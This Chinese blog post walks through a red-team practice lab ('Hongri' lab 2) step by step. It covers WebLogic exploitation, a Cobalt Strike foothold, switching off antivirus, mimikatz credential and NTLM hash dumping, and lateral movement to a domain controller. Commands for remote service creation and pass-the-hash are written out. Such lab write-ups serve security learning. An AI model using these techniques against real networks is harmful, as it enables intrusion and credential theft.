首页 > 其他分享 >红日靶场2

红日靶场2

时间:2023-10-06 19:12:02浏览次数:20  
标签:尝试 红日 上线 机器 DC 192.168 CS 靶场

靶场环境

攻击机器:192.168.142.133(模拟外网)

PC机器:192.168.142.210(模拟外网)、192.168.140.210(模拟内网)

WEB机器:192.168.142.230(模拟外网)、192.168.140.230(模拟内网)

DC机器:192.168.140.220(模拟内网)

(1)通过arp-scan命令探测存活主机

arp-scan -l

(2)发现存在192.168.142.210、192.168.142.230存活,使用nmap进行端口探测

nmap -sV -Pn 192.168.142.210

nmap -sV -Pn 192.168.142.230

(3)发现192.168.142.230主机开放的web服务,尝试访问80端口,啥也没有,尝试访问7001端口

(4)使用Weblogic漏洞检测工具进行检测,成功发现漏洞

(5)尝试使用内存马注入,用冰蝎上线

(6)成功上线冰蝎

(7)只是普通域用户,需要提权,生成后门尝试上线到CS

(8)成功上线CS,通过CS进行提权

(9)没一分钟被360查杀了,尝试使用msf免杀,上传到WEB机器

(10)尝试了msf免杀,CS插件免杀、加壳等,一直被查杀。直接把360关了,以后学习了免杀再来对付。

(11)重新上线CS,继续往下探索。使用CS自带提权工具提权拿到system权限

(12)查看用户信息

(13)使用mimikatz抓取密码、NTLM哈希,直接抓到明文了(我记得Windows2012之后就已经抓不到明文了)

(14)拿到明文密码后,建立IPC连接进行横向

(15)测试是否可以远程查看文件夹

shell dir \\192.168.140.220\c$

(16)尝试计划任务、系统服务上线DC机器

方法一:使用系统服务上线(未成功)

shell copy candada.exe \\192.168.140.220\C$
shell sc \\192.168.140.220 create test binpath= "cmd.exe /c c:\candada.exe"
shell sc \\192.168.140.220 start test

方法二:使用计划任务上线(未成功)

(17)尝试PTH横向

方法一:使用mimikatz进行PTH横向(需要远程登录到WEB机器才能下一步操作),再通过todesk、gotohttp、rustdesk等远程工具或者3389远程控制进行操作

mimikatz sekurlsa::pth /user:administrator /domain:de1ay.com /ntlm:161cff084477fe596a5db81874498a24

方法二:使用CS自带的PTH直接上线,又出现了问题。我在address中没有发现存在192.168.140.220(DC机器),通过net view命令,也没办法探测。

(18)因为计划任务、系统服务都没办法成功上线DC机器,PTH、PTK、PTT攻击都需要配合计划任务或者系统服务上线DC机器,只能尝试其他横向的办法了。

尝试使用IPC配合PsExec上线CS

成功了,但是DC机器没有上线到CS,突然意识到,DC机器可能不出网,导致没办法回连。那之前计划任务、系统服务上线DC机器的没反应,有可能也是因为不出网的原因。

(19)目前掌握CS不出网的技术有SMB-Beacon上线、TCP-Beacon上线、http代理技术+端口转发技术、CS中转技术

SMB-Beacon上线(成功)

TCP-Beacon上线(失败)

http代理技术+端口转发技术(成功)

CS中转技术(成功)

(20)拿下域控后,PC机器通过IPC横向配合PsExec拿下

基本流程:

arp-scan主机探测-》nmap端口探测-》通过Weblogic工具发现漏洞并利用内存马注入-》通过冰蝎连接拿到shell-》上线CS进行提权-》通过system权限抓取密码-》拿到密码后IPC横向-》通过IPC横向配合计划任务-》系统服务上线CS-》发现DC机器不出网-》通过SMB-Beacon、TCP-Beacon、HTTP代理+端口转发、CS中转技术上线DC机器-》IPC横向+PsExec上线PC机器

不足:

(1)在打靶过程中,不会免杀技术,上传的CS马和msf马一下就被查杀。

(2)CS想通过PTH上线时,拿到了NTLM哈希值,但是发现找不到主机,net view命令也执行不了。

标签:尝试,红日,上线,机器,DC,192.168,CS,靶场
From: https://www.cnblogs.com/candada/p/17744826.html

相关文章

  • 【靶场部署】DVWA靶场搭建
    一.靶场是什么,靶场的搭建在学习web安全的过程中,靶场是必不可少的,毕竟在计算机界,任何理论知识都不如实操靶场就是人为提供的带有安全漏洞的服务,每一个学习者都可以在本地快速搭建来实操,回溯漏洞的发生原理以及操作方式。DVWA靶场呢就是一个可以通过浏览器访问的拥有可视化页面的w......
  • 网络安全学习常见的靶场环境
    01DVWADVWA靶场是我们新手入门必练靶场之一,包含暴力破解(BruteForce)、命令注入(CommandInjection)、跨站请求伪造(CSRF)、文件包含(FileInclusion)、文件上传(FileUpload)、不安全的验证码(InsecureCAPTCHA)、SQL注入(SQLInjection)、SQL盲注(SQLInjectionBlind)、反射......
  • vulhub靶场搭建
    配置Docker1、更新sudoapt-getupdate2、下载安装dockersudoaptinstalldocker.io中间碰到询问回复y 3、查看是否安装成功docker-v 4、安装docker-composeaptinstalldocker-compose 5、查看docker-compose安装是否成功docker-compose-v6、配置vulhub......
  • 靶场通关手册_DVWA
    DVWA ❤️暴力破解❤️暴力破解(BruteForce)也称为穷举法,是一种针对于密码的破译方法,即将密码进行逐个推算直到找出真正的密码为止。理论上这种方法可以破解任何一种密码,问题只在于如何缩短试错时间。1.Low级别(1)用户名为admin,密码随便输入,用Burp抓包(2)将抓到的数据包发送到i......
  • DVWA靶场通关-Weak Session IDs(弱会话IDs)
    当用户登录后,在服务器就会创建一个会话(session),叫做会话控制,接着访问页面的时候就不用登录,只需要携带Sesion去访问。Session利用的实质:由于SessionID是用户登录之后才持有的唯一认证凭证,因此黑客不需要再攻击登陆过程(比如密码),就可以轻易获取访问权限,无需登录密码直接进入特......
  • DVWA靶场通关-XSS
    BruteForce(暴力(破解))、CommandInjection(命令行注入)、CSRF(跨站请求伪造)、     FileInclusion(文件包含)、FileUpload(文件上传)、InsecureCAPTCHA(不安全的验证码)、    SQLInjection(SQL注入)、SQLInjection(Blind)(SQL盲注)、XSS(DOM)(基于DOM树)、    XSS(Reflec......
  • DVWA靶场通关- SQL Injection(SQL注入)
    BruteForce(暴力(破解))、CommandInjection(命令行注入)、CSRF(跨站请求伪造)、     FileInclusion(文件包含)、FileUpload(文件上传)、InsecureCAPTCHA(不安全的验证码)、    SQLInjection(SQL注入)、SQLInjection(Blind)(SQL盲注)、XSS(DOM)(基于DOM树)、    XSS(Reflec......
  • DVWA靶场通关-Insecure CAPTCHA (不安全的验证码)
    BruteForce(暴力(破解))、CommandInjection(命令行注入)、CSRF(跨站请求伪造)、     FileInclusion(文件包含)、FileUpload(文件上传)、InsecureCAPTCHA(不安全的验证码)、    SQLInjection(SQL注入)、SQLInjection(Blind)(SQL盲注)、XSS(DOM)(基于DOM树)、    XSS(Reflec......
  • DVWA靶场通关-File Upload(文件上传)
    BruteForce(暴力(破解))、CommandInjection(命令行注入)、CSRF(跨站请求伪造)、     FileInclusion(文件包含)、FileUpload(文件上传)、InsecureCAPTCHA(不安全的验证码)、    SQLInjection(SQL注入)、SQLInjection(Blind)(SQL盲注)、XSS(DOM)(基于DOM树)、    XSS(Reflec......
  • DVWA靶场通关-CSRF(跨站请求伪造)
    BruteForce(暴力(破解))、CommandInjection(命令行注入)、CSRF(跨站请求伪造)、     FileInclusion(文件包含)、FileUpload(文件上传)、InsecureCAPTCHA(不安全的验证码)、    SQLInjection(SQL注入)、SQLInjection(Blind)(SQL盲注)、XSS(DOM)(基于DOM树)、    XSS(Reflec......